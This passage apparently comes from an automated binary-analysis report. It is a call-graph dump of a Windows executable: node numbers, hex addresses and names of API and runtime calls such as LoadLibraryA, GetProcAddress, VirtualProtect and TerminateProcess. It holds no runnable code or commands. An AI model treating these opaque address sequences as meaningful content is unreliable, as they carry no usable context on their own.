93270 21b77a GetLastError 93268->93270 93268->93272 93270->93272 93272->93252 93272->93256 93272->93266 93272->93268 93273 225884 WriteConsoleW CreateFileW __chsize_nolock 93276 21b2f6 93273->93276 93274 2240f7 59 API calls __chsize_nolock 93274->93278 93275 21b28f WideCharToMultiByte 93275->93252 93277 21b2ca WriteFile 93275->93277 93276->93243 93276->93252 93276->93273 93276->93278 93279 21b321 WriteFile 93276->93279 93277->93243 93277->93276 93278->93252 93278->93274 93278->93275 93278->93276 93306 211688 57 API calls __isleadbyte_l 93278->93306 93279->93243 93279->93276 93280->93188 93281->93193 93282->93203 93283->93204 93284->93193 93285->93191 93286->93196 93287->93193 93288->93209 93290 223c0a 93289->93290 93291 223bfd 93289->93291 93293 217c0e _memcpy_s 47 API calls 93290->93293 93295 223c16 93290->93295 93292 217c0e _memcpy_s 47 API calls 93291->93292 93294 223c02 93292->93294 93296 223c37 93293->93296 93294->93235 93295->93235 93297 216e10 _memcpy_s 8 API calls 93296->93297 93297->93294 93298->93225 93299->93230 93300->93250 93301->93228 93302->93237 93303->93250 93304->93233 93305->93244 93306->93278 93307->93267 93308->93250 93309->93250 93310->93257 93311->93250 93313 21a714 93312->93313 93314 21a716 IsProcessorFeaturePresent 93312->93314 93313->93224 93316 2237b0 93314->93316 93317 22375f ___raise_securityfailure 5 API calls 93316->93317 93318 223893 93317->93318 93318->93224 93319->93154 93320->93156 93343 21aba4 93321->93343 93323 21eb00 93356 21ab1e 48 API calls 2 library calls 93323->93356 93324 21eaaa 93324->93323 93326 21aba4 __lseeki64_nolock 47 API calls 93324->93326 93335 21eade 93324->93335 93330 21ead5 93326->93330 93327 21aba4 __lseeki64_nolock 47 API calls 93331 21eaea CloseHandle 93327->93331 93328 21eb08 93329 21eb2a 93328->93329 93357 217bed 47 API calls 3 library calls 93328->93357 93329->93178 93333 21aba4 __lseeki64_nolock 47 API calls 93330->93333 93331->93323 93334 21eaf6 GetLastError 93331->93334 93333->93335 93334->93323 93335->93323 93335->93327 93336->93163 93337->93168 93338->93178 93339->93168 93340->93166 93341->93171 93342->93168 93344 21abc4 93343->93344 93345 21abaf 93343->93345 93349 21abe9 93344->93349 93360 217bda 47 API calls __getptd_noexit 93344->93360 93358 217bda 47 API calls __getptd_noexit 93345->93358 93348 21abb4 93359 217c0e 47 API calls __getptd_noexit 93348->93359 93349->93324 93350 21abf3 93361 217c0e 47 API calls __getptd_noexit 93350->93361 93353 21abbc 93353->93324 93354 21abfb 93362 216e10 8 API calls _memcpy_s 93354->93362 93356->93328 93357->93329 93358->93348 93359->93353 93360->93350 93361->93354 93362->93353 93364 1f9384 93363->93364 93365 1f9380 93363->93365 93366 264cbd __i64tow 93364->93366 93367 1f9398 93364->93367 93368 264bbf 93364->93368 93376 1f93b0 __itow Mailbox _wcscpy 93364->93376 93365->92966 93469 21172b 80 API calls 3 library calls 93367->93469 93369 264ca5 93368->93369 93370 264bc8 93368->93370 93470 21172b 80 API calls 3 library calls 93369->93470 93375 264be7 93370->93375 93370->93376 93373 20f4ea 48 API calls 93374 1f93ba 93373->93374 93374->93365 93377 1fce19 48 API calls 93374->93377 93378 20f4ea 48 API calls 93375->93378 93376->93373 93377->93365 93379 264c04 93378->93379 93380 20f4ea 48 API calls 93379->93380 93381 264c2a 93380->93381 93381->93365 93382 1fce19 48 API calls 93381->93382 93382->93365 93471 1f4214 93383->93471 93388 264f73 93390 1f4252 84 API calls 93388->93390 93389 1f41d4 LoadLibraryExW 93481 1f4291 93389->93481 93392 264f7a 93390->93392 93395 1f4291 3 API calls 93392->93395 93398 264f82 93395->93398 93396 1f41fb 93397 1f4207 93396->93397 93396->93398 93399 1f4252 84 API calls 93397->93399 93507 1f44ed 93398->93507 93401 1f420c 93399->93401 93401->92973 93401->92975 93404 264fa9 93515 1f4950 93404->93515 93690 211e46 93407->93690 93411 236918 _wcschr __ftell_nolock 93410->93411 93412 211dfc __wsplitpath 47 API calls 93411->93412 93415 23692e _wcscat _wcscpy 93411->93415 93413 23695d 93412->93413 93414 211dfc __wsplitpath 47 API calls 93413->93414 93414->93415 93415->92994 93417 23bfb1 __ftell_nolock 93416->93417 93418 20f4ea 48 API calls 93417->93418 93419 23c00e 93418->93419 93420 1f47b7 48 API calls 93419->93420 93421 23c018 93420->93421 93422 23bdb4 GetSystemTimeAsFileTime 93421->93422 93423 23c023 93422->93423 93424 1f4517 83 API calls 93423->93424 93425 23c036 _wcscmp 93424->93425 93426 23c107 93425->93426 93427 23c05a 93425->93427 93428 23c56d 94 API calls 93426->93428 93733 23c56d 93427->93733 93444 23c0d3 _wcscat 93428->93444 93431 211dfc __wsplitpath 47 API calls 93437 23c088 _wcscat _wcscpy 93431->93437 93432 1f44ed 64 API calls 93433 23c12c 93432->93433 93434 1f44ed 64 API calls 93433->93434 93436 23c13c 93434->93436 93435 23c110 93435->93000 93438 1f44ed 64 API calls 93436->93438 93439 211dfc __wsplitpath 47 API calls 93437->93439 93440 23c157 93438->93440 93439->93444 93441 1f44ed 64 API calls 93440->93441 93442 23c167 93441->93442 93443 1f44ed 64 API calls 93442->93443 93445 23c182 93443->93445 93444->93432 93444->93435 93446 1f44ed 64 API calls 93445->93446 93447 23c192 93446->93447 93448 1f44ed 64 API calls 93447->93448 93449 23c1a2 93448->93449 93450 1f44ed 64 API calls 93449->93450 93451 23c1b2 93450->93451 93716 23c71a GetTempPathW GetTempFileNameW 93451->93716 93453 23c1be 93454 213499 117 API calls 93453->93454 93456 23c1cf 93454->93456 93455 2135e4 __fcloseall 83 API calls 93457 23c294 93455->93457 93456->93435 93458 1f44ed 64 API calls 93456->93458 93465 23c289 93456->93465 93717 212aae 93456->93717 93457->93435 93459 23c342 CopyFileW 93457->93459 93460 23c2b8 93457->93460 93458->93456 93459->93435 93464 23c32d 93459->93464 93739 23b965 93460->93739 93464->93435 93730 23c6d9 CreateFileW 93464->93730 93465->93455 93466->92963 93467->92985 93468->92991 93469->93376 93470->93376 93520 1f4339 93471->93520 93474 1f423c 93476 1f41bb 93474->93476 93477 1f4244 FreeLibrary 93474->93477 93478 213499 93476->93478 93477->93476 93528 2134ae 93478->93528 93480 1f41c8 93480->93388 93480->93389 93607 1f42e4 93481->93607 93484 1f42b8 93486 1f41ec 93484->93486 93487 1f42c1 FreeLibrary 93484->93487 93488 1f4380 93486->93488 93487->93486 93489 20f4ea 48 API calls 93488->93489 93490 1f4395 93489->93490 93615 1f47b7 93490->93615 93492 1f43a1 _memcpy_s 93493 1f43dc 93492->93493 93494 1f4499 93492->93494 93495 1f44d1 93492->93495 93496 1f4950 57 API calls 93493->93496 93618 1f406b CreateStreamOnHGlobal 93494->93618 93629 23c750 93 API calls 93495->93629 93502 1f43e5 93496->93502 93499 1f44ed 64 API calls 93499->93502 93501 1f4479 93501->93396 93502->93499 93502->93501 93503 264ed7 93502->93503 93624 1f4517 93502->93624 93504 1f4517 83 API calls 93503->93504 93505 264eeb 93504->93505 93506 1f44ed 64 API calls 93505->93506 93506->93501 93508 1f44ff 93507->93508 93511 264fc0 93507->93511 93647 21381e 93508->93647 93512 23bf5a 93667 23bdb4 93512->93667 93514 23bf70 93514->93404 93516 1f495f 93515->93516 93517 265002 93515->93517 93672 213e65 93516->93672 93519 1f4967 93524 1f434b 93520->93524 93523 1f4321 LoadLibraryA GetProcAddress 93523->93474 93525 1f422f 93524->93525 93526 1f4354 LoadLibraryA 93524->93526 93525->93474 93525->93523 93526->93525 93527 1f4365 GetProcAddress 93526->93527 93527->93525 93531 2134ba __fcloseall 93528->93531 93529 2134cd 93576 217c0e 47 API calls __getptd_noexit 93529->93576 93531->93529 93533 2134fe 93531->93533 93532 2134d2 93577 216e10 8 API calls _memcpy_s 93532->93577 93547 21e4c8 93533->93547 93536 213503 93537 213519 93536->93537 93538 21350c 93536->93538 93540 213543 93537->93540 93541 213523 93537->93541 93578 217c0e 47 API calls __getptd_noexit 93538->93578 93561 21e5e0 93540->93561 93579 217c0e 47 API calls __getptd_noexit 93541->93579 93546 2134dd __fcloseall @_EH4_CallFilterFunc@8 93546->93480 93548 21e4d4 __fcloseall 93547->93548 93549 217cf4 __lock 47 API calls 93548->93549 93555 21e4e2 93549->93555 93550 21e559 93586 2169d0 47 API calls __crtLCMapStringA_stat 93550->93586 93553 21e5cc __fcloseall 93553->93536 93554 21e560 93556 21e56f InitializeCriticalSectionAndSpinCount EnterCriticalSection 93554->93556 93559 21e552 93554->93559 93555->93550 93557 217d7c __mtinitlocknum 47 API calls 93555->93557 93555->93559 93584 214e5b 48 API calls __lock 93555->93584 93585 214ec5 LeaveCriticalSection LeaveCriticalSection _doexit 93555->93585 93556->93559 93557->93555 93581 21e5d7 93559->93581 93570 21e600 __wopenfile 93561->93570 93562 21e61a 93591 217c0e 47 API calls __getptd_noexit 93562->93591 93563 21e7d5 93563->93562 93567 21e838 93563->93567 93565 21e61f 93592 216e10 8 API calls _memcpy_s 93565->93592 93588 2263c9 93567->93588 93568 21354e 93580 213570 LeaveCriticalSection LeaveCriticalSection _fprintf 93568->93580 93570->93562 93570->93563 93593 21185b 59 API calls 2 library calls 93570->93593 93572 21e7ce 93572->93563 93594 21185b 59 API calls 2 library calls 93572->93594 93574 21e7ed 93574->93563 93595 21185b 59 API calls 2 library calls 93574->93595 93576->93532 93577->93546 93578->93546 93579->93546 93580->93546 93587 217e58 LeaveCriticalSection 93581->93587 93583 21e5de 93583->93553 93584->93555 93585->93555 93586->93554 93587->93583 93596 225bb1 93588->93596 93590 2263e2 93590->93568 93591->93565 93592->93568 93593->93572 93594->93574 93595->93563 93599 225bbd __fcloseall 93596->93599 93597 225bcf 93598 217c0e _memcpy_s 47 API calls 93597->93598 93600 225bd4 93598->93600 93599->93597 93601 225c06 93599->93601 93603 216e10 _memcpy_s 8 API calls 93600->93603 93602 225c78 __wsopen_helper 110 API calls 93601->93602 93604 225c23 93602->93604 93606 225bde __fcloseall 93603->93606 93605 225c4c __wsopen_helper LeaveCriticalSection 93604->93605 93605->93606 93606->93590 93611 1f42f6 93607->93611 93610 1f42cc LoadLibraryA GetProcAddress 93610->93484 93612 1f42aa 93611->93612 93613 1f42ff LoadLibraryA 93611->93613 93612->93484 93612->93610 93613->93612 93614 1f4310 GetProcAddress 93613->93614 93614->93612 93616 20f4ea 48 API calls 93615->93616 93617 1f47c9 93616->93617 93617->93492 93619 1f4085 FindResourceExW 93618->93619 93623 1f40a2 93618->93623 93620 264f16 LoadResource 93619->93620 93619->93623 93621 264f2b SizeofResource 93620->93621 93620->93623 93622 264f3f LockResource 93621->93622 93621->93623 93622->93623 93623->93493 93625 1f4526 93624->93625 93628 264fe0 93624->93628 93630 213a8d 93625->93630 93627 1f4534 93627->93502 93629->93493 93631 213a99 __fcloseall 93630->93631 93632 213aa7 93631->93632 93634 213acd 93631->93634 93643 217c0e 47 API calls __getptd_noexit 93632->93643 93636 214e1c __lock_file 48 API calls 93634->93636 93635 213aac 93644 216e10 8 API calls _memcpy_s 93635->93644 93638 213ad3 93636->93638 93645 2139fe 81 API calls 4 library calls 93638->93645 93640 213ae2 93646 213b04 LeaveCriticalSection LeaveCriticalSection _fprintf 93640->93646 93642 213ab7 __fcloseall 93642->93627 93643->93635 93644->93642 93645->93640 93646->93642 93650 213839 93647->93650 93649 1f4510 93649->93512 93651 213845 __fcloseall 93650->93651 93652 213880 __fcloseall 93651->93652 93653 213888 93651->93653 93654 21385b _memset 93651->93654 93652->93649 93655 214e1c __lock_file 48 API calls 93653->93655 93663 217c0e 47 API calls __getptd_noexit 93654->93663 93657 21388e 93655->93657 93665 21365b 62 API calls 3 library calls 93657->93665 93658 213875 93664 216e10 8 API calls _memcpy_s 93658->93664 93661 2138a4 93666 2138c2 LeaveCriticalSection LeaveCriticalSection _fprintf 93661->93666 93663->93658 93664->93652 93665->93661 93666->93652 93670 21344a GetSystemTimeAsFileTime 93667->93670 93669 23bdc3 93669->93514 93671 213478 __aulldiv 93670->93671 93671->93669 93673 213e71 __fcloseall 93672->93673 93674 213e94 93673->93674 93675 213e7f 93673->93675 93677 214e1c __lock_file 48 API calls 93674->93677 93686 217c0e 47 API calls __getptd_noexit 93675->93686 93679 213e9a 93677->93679 93678 213e84 93687 216e10 8 API calls _memcpy_s 93678->93687 93688 213b0c 55 API calls 4 library calls 93679->93688 93682 213ea5 93689 213ec5 LeaveCriticalSection LeaveCriticalSection _fprintf 93682->93689 93684 213eb7 93685 213e8f __fcloseall 93684->93685 93685->93519 93686->93678 93687->93685 93688->93682 93689->93684 93691 211e61 93690->93691 93694 211e55 93690->93694 93714 217c0e 47 API calls __getptd_noexit 93691->93714 93693 212019 93698 211e41 93693->93698 93715 216e10 8 API calls _memcpy_s 93693->93715 93694->93691 93704 211ed4 93694->93704 93709 219d6b 47 API calls _memcpy_s 93694->93709 93697 211fa0 93697->93691 93697->93698 93700 211fb0 93697->93700 93698->92988 93699 211f5f 93699->93691 93701 211f7b 93699->93701 93711 219d6b 47 API calls _memcpy_s 93699->93711 93713 219d6b 47 API calls _memcpy_s 93700->93713 93701->93691 93701->93698 93703 211f91 93701->93703 93712 219d6b 47 API calls _memcpy_s 93703->93712 93704->93691 93708 211f41 93704->93708 93710 219d6b 47 API calls _memcpy_s 93704->93710 93708->93697 93708->93699 93709->93704 93710->93708 93711->93701 93712->93698 93713->93698 93714->93693 93715->93698 93716->93453 93718 212aba __fcloseall 93717->93718 93719 212ad4 93718->93719 93720 212aec 93718->93720 93723 212ae4 __fcloseall 93718->93723 93782 217c0e 47 API calls __getptd_noexit 93719->93782 93721 214e1c __lock_file 48 API calls 93720->93721 93724 212af2 93721->93724 93723->93456 93770 212957 93724->93770 93725 212ad9 93783 216e10 8 API calls _memcpy_s 93725->93783 93731 23c715 93730->93731 93732 23c6ff SetFileTime CloseHandle 93730->93732 93731->93435 93732->93731 93738 23c581 __tzset_nolock _wcscmp 93733->93738 93734 1f44ed 64 API calls 93734->93738 93735 23c05f 93735->93431 93735->93435 93736 23bf5a GetSystemTimeAsFileTime 93736->93738 93737 1f4517 83 API calls 93737->93738 93738->93734 93738->93735 93738->93736 93738->93737 93740 23b970 93739->93740 93741 23b97e 93739->93741 93742 213499 117 API calls 93740->93742 93743 23b9c3 93741->93743 93744 213499 117 API calls 93741->93744 93755 23b987 93741->93755 93742->93741 93788 23bbe8 64 API calls 3 library calls 93743->93788 93745 23b9a8 93744->93745 93745->93743 93747 23b9b1 93745->93747 93751 2135e4 __fcloseall 83 API calls 93747->93751 93747->93755 93748 23ba07 93749 23ba0b 93748->93749 93750 23ba2c 93748->93750 93753 23ba18 93749->93753 93754 2135e4 __fcloseall 83 API calls 93749->93754 93789 23b7e5 47 API calls __crtLCMapStringA_stat 93750->93789 93751->93755 93753->93755 93757 2135e4 __fcloseall 83 API calls 93753->93757 93754->93753 93755->93464 93756 23ba34 93758 23ba5a 93756->93758 93759 23ba3a 93756->93759 93757->93755 93790 23ba8a 90 API calls 93758->93790 93761 23ba47 93759->93761 93763 2135e4 __fcloseall 83 API calls 93759->93763 93761->93755 93764 2135e4 __fcloseall 83 API calls 93761->93764 93762 23ba61 93791 23bb64 93762->93791 93763->93761 93764->93755 93767 23ba75 93767->93755 93769 2135e4 __fcloseall 83 API calls 93767->93769 93768 2135e4 __fcloseall 83 API calls 93768->93767 93769->93755 93773 212966 93770->93773 93776 212984 93770->93776 93771 212974 93785 217c0e 47 API calls __getptd_noexit 93771->93785 93773->93771 93773->93776 93781 21299c _memcpy_s 93773->93781 93774 212979 93786 216e10 8 API calls _memcpy_s 93774->93786 93784 212b24 LeaveCriticalSection LeaveCriticalSection _fprintf 93776->93784 93778 212c84 __flush 78 API calls 93778->93781 93779 212933 __filbuf 47 API calls 93779->93781 93780 21af61 __flswbuf 78 API calls 93780->93781 93781->93776 93781->93778 93781->93779 93781->93780 93787 218e63 78 API calls 5 library calls 93781->93787 93782->93725 93783->93723 93784->93723 93785->93774 93786->93776 93787->93781 93788->93748 93789->93756 93790->93762 93792 23bb71 93791->93792 93793 23bb77 93791->93793 93794 211c9d _free 47 API calls 93792->93794 93795 23bb88 93793->93795 93796 211c9d _free 47 API calls 93793->93796 93794->93793 93797 23ba68 93795->93797 93798 211c9d _free 47 API calls 93795->93798 93796->93795 93797->93767 93797->93768 93798->93797 93828 1f6b0f 93799->93828 93801 1fb69b 93840 1fba85 48 API calls _memcpy_s 93801->93840 93803 1fb6b5 Mailbox 93803->93006 93806 26397b 93854 2326bc 88 API calls 4 library calls 93806->93854 93807 1fb9e4 93856 2326bc 88 API calls 4 library calls 93807->93856 93810 263973 93810->93803 93812 1fba85 48 API calls 93817 1fb495 93812->93817 93814 263989 93855 1fba85 48 API calls _memcpy_s 93814->93855 93815 1fbcce 48 API calls 93815->93817 93817->93801 93817->93806 93817->93807 93817->93812 93817->93815 93818 263909 93817->93818 93823 1fbdfa 48 API calls 93817->93823 93826 263939 _memcpy_s 93817->93826 93833 1fc413 59 API calls 93817->93833 93834 1fbb85 93817->93834 93839 1fbc74 48 API calls 93817->93839 93841 1fc6a5 49 API calls 93817->93841 93842 1fc799 93817->93842 93850 1f6b4a 93818->93850 93821 263914 93825 20f4ea 48 API calls 93821->93825 93824 1fb66c CharUpperBuffW 93823->93824 93824->93817 93825->93826 93853 2326bc 88 API calls 4 library calls 93826->93853 93827->93010 93829 20f4ea 48 API calls 93828->93829 93830 1f6b34 93829->93830 93831 1f6b4a 48 API calls 93830->93831 93832 1f6b43 93831->93832 93832->93817 93833->93817 93835 1fbb9b 93834->93835 93837 1fbb96 _memcpy_s 93834->93837 93836 20ee75 48 API calls 93835->93836 93838 261b77 93835->93838 93836->93837 93837->93817 93838->93838 93839->93817 93840->93803 93841->93817 93843 261f17 93842->93843 93846 1fc7b0 93842->93846 93844 1f6b4a 48 API calls 93843->93844 93845 261f21 93844->93845 93848 20f4ea 48 API calls 93845->93848 93847 1fc7bd _memcpy_s 93846->93847 93849 20ee75 48 API calls 93846->93849 93847->93817 93848->93847 93849->93847 93851 20f4ea 48 API calls 93850->93851 93852 1f6b54 93851->93852 93852->93821 93853->93810 93854->93814 93855->93810 93856->93810 93857->93051 93858->93017 93859->93026 93860->93028 93861->93033 93862->93043 93863->93045 93864->93049 93865->92730 93866->92730 93867->92731 93868->92731 93869->92724 93870->92717 93871->92732 93872->92744 93873->92744 93874->92745 93875->92761 93876->92767 93877 269bec 93912 200ae0 _memcpy_s Mailbox 93877->93912 93879 20f4ea 48 API calls 93879->93912 93882 20146e 93892 1f6eed 48 API calls 93882->93892 93885 200509 93972 23cc5c 86 API calls 4 library calls 93885->93972 93887 20f4ea 48 API calls 93903 1ffec8 93887->93903 93888 201473 93971 23cc5c 86 API calls 4 library calls 93888->93971 93890 26a922 93891 26a246 93896 1f6eed 48 API calls 93891->93896 93907 1fffe1 Mailbox 93892->93907 93894 1f6eed 48 API calls 93894->93903 93896->93907 93897 26a873 93898 2297ed InterlockedDecrement 93898->93903 93899 1fd7f7 48 API calls 93899->93903 93900 26a30e 93900->93907 93967 2297ed InterlockedDecrement 93900->93967 93901 1fce19 48 API calls 93901->93912 93903->93882 93903->93885 93903->93887 93903->93888 93903->93891 93903->93894 93903->93898 93903->93899 93903->93900 93904 26a973 93903->93904 93905 210f0a 52 API calls __cinit 93903->93905 93903->93907 93909 2015b5 93903->93909 93964 201820 331 API calls 2 library calls 93903->93964 93965 201d10 59 API calls Mailbox 93903->93965 93973 23cc5c 86 API calls 4 library calls 93904->93973 93905->93903 93908 26a982 93970 23cc5c 86 API calls 4 library calls 93909->93970 93910 24e822 331 API calls 93910->93912 93911 1ffe30 331 API calls 93911->93912 93912->93879 93912->93901 93912->93903 93912->93907 93912->93910 93912->93911 93913 26a706 93912->93913 93915 201526 Mailbox 93912->93915 93916 2297ed InterlockedDecrement 93912->93916 93917 246ff0 331 API calls 93912->93917 93920 250d09 93912->93920 93923 250d1d 93912->93923 93926 24f0ac 93912->93926 93958 23a6ef 93912->93958 93966 24ef61 82 API calls 2 library calls 93912->93966 93968 23cc5c 86 API calls 4 library calls 93913->93968 93969 23cc5c 86 API calls 4 library calls 93915->93969 93916->93912 93917->93912 93974 24f8ae 93920->93974 93922 250d19 93922->93912 93924 24f8ae 129 API calls 93923->93924 93925 250d2d 93924->93925 93925->93912 93927 1fd7f7 48 API calls 93926->93927 93928 24f0c0 93927->93928 93929 1fd7f7 48 API calls 93928->93929 93930 24f0c8 93929->93930 93931 1fd7f7 48 API calls 93930->93931 93932 24f0d0 93931->93932 93933 1f936c 81 API calls 93932->93933 93956 24f0de 93933->93956 93934 1f6a63 48 API calls 93934->93956 93935 24f2cc 93936 24f2f9 Mailbox 93935->93936 94112 1f6b68 48 API calls 93935->94112 93936->93912 93938 24f2b3 94093 1f518c 93938->94093 93940 1fc799 48 API calls 93940->93956 93941 24f2ce 93944 1f518c 48 API calls 93941->93944 93942 1f6eed 48 API calls 93942->93956 93946 24f2dd 93944->93946 93949 1f510d 48 API calls 93946->93949 93947 1fbdfa 48 API calls 93948 24f175 CharUpperBuffW 93947->93948 93951 1fd645 53 API calls 93948->93951 93949->93935 93950 1fbdfa 48 API calls 93952 24f23a CharUpperBuffW 93950->93952 93951->93956 94092 20d922 55 API calls 2 library calls 93952->94092 93954 1f936c 81 API calls 93954->93956 93955 1f510d 48 API calls 93955->93956 93956->93934 93956->93935 93956->93936 93956->93938 93956->93940 93956->93941 93956->93942 93956->93947 93956->93950 93956->93954 93956->93955 93957 1f518c 48 API calls 93956->93957 93957->93956 93959 23a6fb 93958->93959 93960 20f4ea 48 API calls 93959->93960 93961 23a709 93960->93961 93962 23a717 93961->93962 93963 1fd7f7 48 API calls 93961->93963 93962->93912 93963->93962 93964->93903 93965->93903 93966->93912 93967->93907 93968->93915 93969->93907 93970->93907 93971->93897 93972->93890 93973->93908 93975 1f936c 81 API calls 93974->93975 93976 24f8ea 93975->93976 94001 24f92c Mailbox 93976->94001 94010 250567 93976->94010 93978 24fb8b 93979 24fcfa 93978->93979 93983 24fb95 93978->93983 94069 250688 89 API calls Mailbox 93979->94069 93982 24fd07 93982->93983 93984 24fd13 93982->93984 94023 24f70a 93983->94023 93984->94001 93985 1f936c 81 API calls 94003 24f984 Mailbox 93985->94003 93990 24fbc9 94037 20ed18 93990->94037 93993 24fbe3 94067 23cc5c 86 API calls 4 library calls 93993->94067 93994 24fbfd 94041 20c050 93994->94041 93997 24fbee GetCurrentProcess TerminateProcess 93997->93994 93998 24fc14 93999 201b90 48 API calls 93998->93999 94009 24fc3e 93998->94009 94002 24fc2d 93999->94002 94000 24fd65 94000->94001 94006 24fd7e FreeLibrary 94000->94006 94001->93922 94004 25040f 105 API calls 94002->94004 94003->93978 94003->93985 94003->94001 94003->94003 94065 2529e8 48 API calls _memcpy_s 94003->94065 94066 24fda5 60 API calls 2 library calls 94003->94066 94004->94009 94005 201b90 48 API calls 94005->94009 94006->94001 94009->94000 94009->94005 94052 25040f 94009->94052 94068 1fdcae 50 API calls Mailbox 94009->94068 94011 1fbdfa 48 API calls 94010->94011 94012 250582 CharLowerBuffW 94011->94012 94070 231f11 94012->94070 94016 1fd7f7 48 API calls 94017 2505bb 94016->94017 94077 1f69e9 48 API calls _memcpy_s 94017->94077 94019 2505d2 94078 1fb18b 94019->94078 94021 2505de Mailbox 94022 25061a Mailbox 94021->94022 94082 24fda5 60 API calls 2 library calls 94021->94082 94022->94003 94024 24f725 94023->94024 94028 24f77a 94023->94028 94025 20f4ea 48 API calls 94024->94025 94027 24f747 94025->94027 94026 20f4ea 48 API calls 94026->94027 94027->94026 94027->94028 94029 250828 94028->94029 94030 250a53 Mailbox 94029->94030 94036 25084b _strcat _wcscpy __wsetenvp 94029->94036 94030->93990 94031 1fcf93 58 API calls 94031->94036 94032 1fd286 48 API calls 94032->94036 94033 1f936c 81 API calls 94033->94036 94034 21395c 47 API calls __crtLCMapStringA_stat 94034->94036 94036->94030 94036->94031 94036->94032 94036->94033 94036->94034 94085 238035 50 API calls __wsetenvp 94036->94085 94040 20ed2d 94037->94040 94038 20edc5 VirtualProtect 94039 20ed93 94038->94039 94039->93993 94039->93994 94040->94038 94040->94039 94042 20c064 94041->94042 94044 20c069 Mailbox 94041->94044 94086 20c1af 48 API calls 94042->94086 94050 20c077 94044->94050 94087 20c15c 48 API calls 94044->94087 94046 20f4ea 48 API calls 94048 20c108 94046->94048 94047 20c152 94047->93998 94049 20f4ea 48 API calls 94048->94049 94051 20c113 94049->94051 94050->94046 94050->94047 94051->93998 94051->94051 94053 250427 94052->94053 94064 250443 94052->94064 94054 25044f 94053->94054 94055 25042e 94053->94055 94056 2504f8 94053->94056 94053->94064 94090 1fcdb9 48 API calls 94054->94090 94088 237c56 50 API calls _strlen 94055->94088 94091 239dc5 103 API calls 94056->94091 94057 25051e 94057->94009 94060 211c9d _free 47 API calls 94060->94057 94062 250438 94089 1fcdb9 48 API calls 94062->94089 94064->94057 94064->94060 94065->94003 94066->94003 94067->93997 94068->94009 94069->93982 94071 231f3b __wsetenvp 94070->94071 94072 231f79 94071->94072 94073 231f6f 94071->94073 94075 231ffa 94071->94075 94072->94016 94072->94021 94073->94072 94083 20d37a 60 API calls 94073->94083 94075->94072 94084 20d37a 60 API calls 94075->94084 94077->94019 94079 1fb199 94078->94079 94081 1fb1a2 _memcpy_s 94078->94081 94080 1fbdfa 48 API calls 94079->94080 94079->94081 94080->94081 94081->94021 94082->94022 94083->94073 94084->94075 94085->94036 94086->94044 94087->94050 94088->94062 94089->94064 94090->94064 94091->94064 94092->93956 94094 1f5197 94093->94094 94095 1f519f 94094->94095 94096 261ace 94094->94096 94113 1f5130 94095->94113 94098 1f6b4a 48 API calls 94096->94098 94100 261adb __wsetenvp 94098->94100 94099 1f51aa 94103 1f510d 94099->94103 94101 20ee75 48 API calls 94100->94101 94102 261b07 _memcpy_s 94101->94102 94104 1f511f 94103->94104 94105 261be7 94103->94105 94123 1fb384 94104->94123 94132 22a58f 48 API calls _memcpy_s 94105->94132 94108 1f512b 94108->93935 94109 261bf1 94110 1f6eed 48 API calls 94109->94110 94111 261bf9 Mailbox 94110->94111 94112->93936 94114 1f513f __wsetenvp 94113->94114 94115 261b27 94114->94115 94116 1f5151 94114->94116 94118 1f6b4a 48 API calls 94115->94118 94117 1fbb85 48 API calls 94116->94117 94119 1f515e _memcpy_s 94117->94119 94120 261b34 94118->94120 94119->94099 94121 20ee75 48 API calls 94120->94121 94122 261b57 _memcpy_s 94121->94122 94124 1fb392 94123->94124 94131 1fb3c5 _memcpy_s 94123->94131 94125 1fb3fd 94124->94125 94126 1fb3b8 94124->94126 94124->94131 94128 20f4ea 48 API calls 94125->94128 94127 1fbb85 48 API calls 94126->94127 94127->94131 94129 1fb407 94128->94129 94130 20f4ea 48 API calls 94129->94130 94130->94131 94131->94108 94132->94109 94133 2619cb 94138 1f2322 94133->94138 94135 2619d1 94171 210f0a 52 API calls __cinit 94135->94171 94137 2619db 94139 1f2344 94138->94139 94172 1f26df 94139->94172 94144 1fd7f7 48 API calls 94145 1f2384 94144->94145 94146 1fd7f7 48 API calls 94145->94146 94147 1f238e 94146->94147 94148 1fd7f7 48 API calls 94147->94148 94149 1f2398 94148->94149 94150 1fd7f7 48 API calls 94149->94150 94151 1f23de 94150->94151 94152 1fd7f7 48 API calls 94151->94152 94153 1f24c1 94152->94153 94180 1f263f 94153->94180 94157 1f24f1 94158 1fd7f7 48 API calls 94157->94158 94159 1f24fb 94158->94159 94209 1f2745 94159->94209 94161 1f2546 94162 1f2556 GetStdHandle 94161->94162 94163 26501d 94162->94163 94164 1f25b1 94162->94164 94163->94164 94166 265026 94163->94166 94165 1f25b7 CoInitialize 94164->94165 94165->94135 94216 2392d4 53 API calls 94166->94216 94168 26502d 94217 2399f9 CreateThread 94168->94217 94170 265039 CloseHandle 94170->94165 94171->94137 94218 1f2854 94172->94218 94176 1f234a 94177 1f272e 94176->94177 94244 1f27ec 6 API calls 94177->94244 94179 1f237a 94179->94144 94181 1fd7f7 48 API calls 94180->94181 94182 1f264f 94181->94182 94183 1fd7f7 48 API calls 94182->94183 94184 1f2657 94183->94184 94245 1f26a7 94184->94245 94187 1f26a7 48 API calls 94188 1f2667 94187->94188 94189 1fd7f7 48 API calls 94188->94189 94190 1f2672 94189->94190 94191 20f4ea 48 API calls 94190->94191 94192 1f24cb 94191->94192 94193 1f22a4 94192->94193 94194 1f22b2 94193->94194 94195 1fd7f7 48 API calls 94194->94195 94196 1f22bd 94195->94196 94197 1fd7f7 48 API calls 94196->94197 94198 1f22c8 94197->94198 94199 1fd7f7 48 API calls 94198->94199 94200 1f22d3 94199->94200 94201 1fd7f7 48 API calls 94200->94201 94202 1f22de 94201->94202 94203 1f26a7 48 API calls 94202->94203 94204 1f22e9 94203->94204 94205 20f4ea 48 API calls 94204->94205 94206 1f22f0 94205->94206 94207 261fe7 94206->94207 94208 1f22f9 RegisterWindowMessageW 94206->94208 94208->94157 94210 1f2755 94209->94210 94211 265f4d 94209->94211 94212 20f4ea 48 API calls 94210->94212 94250 23c942 50 API calls 94211->94250 94214 1f275d 94212->94214 94214->94161 94215 265f58 94216->94168 94217->94170 94251 2399df 54 API calls 94217->94251 94236 1f2870 94218->94236 94221 1f2870 48 API calls 94222 1f2864 94221->94222 94223 1fd7f7 48 API calls 94222->94223 94224 1f2716 94223->94224 94225 1f6a63 94224->94225 94226 1f6adf 94225->94226 94229 1f6a6f __wsetenvp 94225->94229 94227 1fb18b 48 API calls 94226->94227 94228 1f6ab6 _memcpy_s 94227->94228 94228->94176 94230 1f6a8b 94229->94230 94231 1f6ad7 94229->94231 94233 1f6b4a 48 API calls 94230->94233 94243 1fc369 48 API calls 94231->94243 94234 1f6a95 94233->94234 94235 20ee75 48 API calls 